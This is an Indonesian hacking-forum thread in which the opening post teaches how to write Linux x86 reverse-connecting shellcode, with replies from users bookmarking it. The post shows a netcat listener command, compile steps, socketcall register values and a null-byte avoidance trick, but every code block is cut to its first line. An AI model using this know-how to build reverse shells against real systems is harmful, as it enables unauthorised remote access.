Home General Computer Multimedia Business Lounge
|
Tutor membuat reverse connecting shellcode (pesanan papa schumbag)
|
|
02-04-2012, 12:27 PM
(This post was last modified: 02-04-2012 12:29 PM by ack_attack.)
|
|||
|
|||
|
membuat reverse connecting shellcode (pesanan papa schumbag)
Dipersembahkan khusus untuk : papa schumbag (maaf papa, aku agak jarang online di YM, jadi aku tulis tutornya di DC dech)....
perkenalkan kakak, nama aku ack_attack... nah, sebagai tanda perkenalan diri aku, ini ada sedikit tutorial yang mungkin bisa membantu... kali ini tutorial tentang cara membuat reverse connecting shellcode.. 1. Q : Apakah "reverse connecting shellcode" itu? A : Reverse connecting shellcode adalah shellcode yang kali ini berperan sebagai client dan sang attacker menyiapkan sebuah server yang siap dihubungi di address dan port tertentu. Misal IP address punya attacker adalah 127.0.0.1 dan port 27155 dan IP komputer target adalah 127.0.0.1 (hanya simulasi dalam 1 komputer). Figure 1.0 : Programnya dalam bahasa C Code: #include <stdio.h>Figure 1.1 : siapkan sebuah server untuk mendengar koneksi yang masuk (listening incoming connection) Code: syn-attack@war-machine:~/shellcode$ nc -vvv -l 27155Figure 1.2 : di lain terminal (ingat : simulasi serangan ini dalam 1 komputer) compile dan jalankan programnya Code: syn-attack@war-machine:~/shellcode$ gcc -o revconn revconn.cFigure 1.3 : kembali di terminal yang tadi, apabila koneksi berhasil, muncul tulisan seperti di bawah ini Code: syn-attack@war-machine:~/shellcode$ nc -vvv -l 27155Nah, sekarang kita akan membuat program tadi dalam bahasa assembly, sebelum kita mulai membuat kodenya, ada beberapa catatan di bawah yang perlu diperhatikan : 1. tentang nilai register "ebx" - ebx : 1 for socket() - ebx : 2 for bind() - ebx : 3 for connect() - ebx : 4 for listen() - ebx : 5 for accept() 2. tentang menghindari null-bytes dalam proses "push" alamat IP sekilas kita bisa menuliskan sebagai berikut : Code: push dword 0x0100007fmaka aku akan mengganti instruksinya sebagai berikut : Code: mov dl, byte 0x011. pisahkan alamat IP tersebut dalam 2 bagian : 0100 dan 007f 2. agar register dx bernilai 256 (0x0100 = 256), pindahkan saja nilai 0x01 ke register dl, dan geser nilainya ke kiri (shift left) sebanyak 8 bit, dan pindahkan nilainya ke register dx, jadi register dx sekarang bernilai 0x0100 3. agar register cx bernilai 127 (0x007f = 127), pindahkan saja nilai 0x7f ke register cl, dan geser nilainya ke kiri (shift left) sebanyak 8 bit, dan pindahkan nilainya ke register cx, sekarang register cx bernilai 0x7f00 (0x7f00 = 32512). nah, agar register cx kembali ke nilai 0x007f, geser 0x7f00 ke kanan (shift right) sebanyak 8 bit. Figure 1.4 : Program reverse connecting dalam bahasa assembly Code: BITS 32Figure 1.5 : Compile dan ekstrak opcodenya Code: syn-attack@war-machine:~/shellcode$ nasm -f elf elf_reverse.asmFigure 1.6 : Hasil shellcode final Code: /*Demikianlah kakak atas perkenalanku dan tutorial sederhana ini, semoga berguna kakak.....
|
|||
Reputed by : hipokrit(+1) , tabun(+1) , ketek(+1) , thedexwan(+1) , ditatompel(+1) , alessandra(+1) |
|
02-04-2012, 12:37 PM
|
|||
|
|||
|
RE: membuat reverse connecting shellcode (pesanan papa schumbag)
ijin arsipin dlu kk bwt bahan
|
|||
|
02-04-2012, 12:39 PM
|
|||
|
|||
|
RE: membuat reverse connecting shellcode (pesanan papa schumbag)
CitooZz Banditozz ~# silahkan kakak.... ^_^
|
|||
|
02-04-2012, 01:14 PM
|
|||
|
|||
|
RE: membuat reverse connecting shellcode (pesanan papa schumbag)
mantap...
![]() ane baru tau klo omz ack_attack anaknya omz cakil..
|
|||
|
02-04-2012, 01:19 PM
|
|||
|
|||
|
RE: membuat reverse connecting shellcode (pesanan papa schumbag)
kakak tabun ~# wkwkwkwkwkwkwk
|
|||
|
02-04-2012, 01:31 PM
|
|||
|
|||
|
RE: membuat reverse connecting shellcode (pesanan papa schumbag)
ijin Bookmark dulu om....
tgu jaringan bagus
|
|||
|
02-04-2012, 04:30 PM
(This post was last modified: 02-04-2012 04:31 PM by ketek.)
|
|||
|
|||
|
RE: membuat reverse connecting shellcode (pesanan papa schumbag)
wahh,, om ack_attack berarti ni sodaranya om syn_attack yah
![]() bentar lagi nongol fin_attack ![]() mantap om tutornya
|
|||
|
02-04-2012, 05:30 PM
|
|||
|
|||
|
RE: membuat reverse connecting shellcode (pesanan papa schumbag)
Wah mantep bgt om... Ane Arsipin dulu buat belajar...
|
|||
|
02-04-2012, 05:48 PM
|
|||
|
|||
|
RE: membuat reverse connecting shellcode (pesanan papa schumbag)
wwaww lengkap ane arsipin dulu bg buat bahan belajar
|
|||
|
03-22-2012, 11:59 AM
|
|||
|
|||
|
RE: membuat reverse connecting shellcode (pesanan papa schumbag)
keren parah
gilakajarin gw dong
|
|||
|
« Next Oldest | Next Newest »
|
| Topic Tools | ||||||
| ||||||
| Users Browsing |
| 1 Guest(s) |








gilak






